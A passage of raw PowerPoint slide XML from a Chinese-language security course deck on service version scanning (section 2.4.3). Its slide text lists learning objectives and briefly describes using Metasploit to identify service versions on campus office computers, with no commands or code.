                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="9716135" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.了解各种常见的服务。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.掌握Metasploit工具确定目标主机的服务版本信息的方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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18" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1551305" y="1825625"/>
            <a:ext cx="8547735" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>Metasploit是一个利用和验证工具，可将测试工作流程划分为更小和更易于管理的任务。通过基于Web 的用户界面，利用Metasploit框架及其漏洞，并利用数据库的功能可以进行安全性评估和漏洞验证。使用Metasploit工具能够检测校园内办公计算机当前的服务版本信息，并检查其是否存在常见漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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18" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
